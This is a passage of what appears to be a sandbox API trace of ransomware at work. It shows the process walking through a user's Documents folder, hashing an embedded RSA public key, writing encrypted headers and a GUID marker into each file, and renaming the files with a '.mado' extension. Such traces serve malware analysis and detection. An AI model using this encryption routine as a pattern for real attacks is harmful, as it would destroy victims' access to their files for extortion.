Size=0x14) returned 0x32b36e0 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feac0 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fead8 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fead8 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6ec98 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6edb0 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74b68 [0205.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feac0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b668a0 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.775] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x8ec6, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x8ec6, lpOverlapped=0x0) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.775] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8ecb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.775] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0205.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0205.775] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0205.775] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.775] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.776] CloseHandle (hObject=0x63c) returned 1 [0205.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74b68 [0205.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.777] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\eGIHThgcy2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\egihthgcy2.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\eGIHThgcy2.ods.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\egihthgcy2.ods.mado")) returned 1 [0205.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.783] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0205.784] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1283c70, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0xcec95950, ftLastAccessTime.dwHighDateTime=0x1d5e736, ftLastWriteTime.dwLowDateTime=0xcec95950, ftLastWriteTime.dwHighDateTime=0x1d5e736, nFileSizeHigh=0x0, nFileSizeLow=0x14397, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OJWYIYCEFUYJwTNqEeh.xlsx", cAlternateFileName="OJWYIY~1.XLS")) returned 1 [0205.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0205.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0205.784] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\OJWYIYCEFUYJwTNqEeh.xlsx") returned=".xlsx" [0205.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\OJWYIYCEFUYJwTNqEeh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ojwyiycefuyjwtnqeeh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.785] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=82839) returned 1 [0205.786] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.788] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14371, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.788] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.789] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.789] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14397, lpOverlapped=0x0) returned 1 [0205.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.790] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.791] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.791] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.791] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.791] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.791] GetLastError () returned 0x0 [0205.791] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.791] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.792] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.792] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.792] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.792] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.793] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14397, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.793] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.793] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.793] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.793] CloseHandle (hObject=0x63c) returned 1 [0205.794] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\OJWYIYCEFUYJwTNqEeh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ojwyiycefuyjwtnqeeh.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\OJWYIYCEFUYJwTNqEeh.xlsx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ojwyiycefuyjwtnqeeh.xlsx.mado")) returned 1 [0205.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.795] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0205.796] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8adfb420, ftCreationTime.dwHighDateTime=0x1d5e199, ftLastAccessTime.dwLowDateTime=0x98074e80, ftLastAccessTime.dwHighDateTime=0x1d5df49, ftLastWriteTime.dwLowDateTime=0x98074e80, ftLastWriteTime.dwHighDateTime=0x1d5df49, nFileSizeHigh=0x0, nFileSizeLow=0x162b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pNQA4jq_V4.pptx", cAlternateFileName="PNQA4J~1.PPT")) returned 1 [0205.796] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\pNQA4jq_V4.pptx") returned=".pptx" [0205.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\pNQA4jq_V4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\pnqa4jq_v4.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.797] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=90809) returned 1 [0205.797] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.799] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16293, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.799] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.800] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x162b9, lpOverlapped=0x0) returned 1 [0205.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.802] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.802] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.802] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.802] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.802] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.802] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.802] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.802] GetLastError () returned 0x0 [0205.803] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.803] 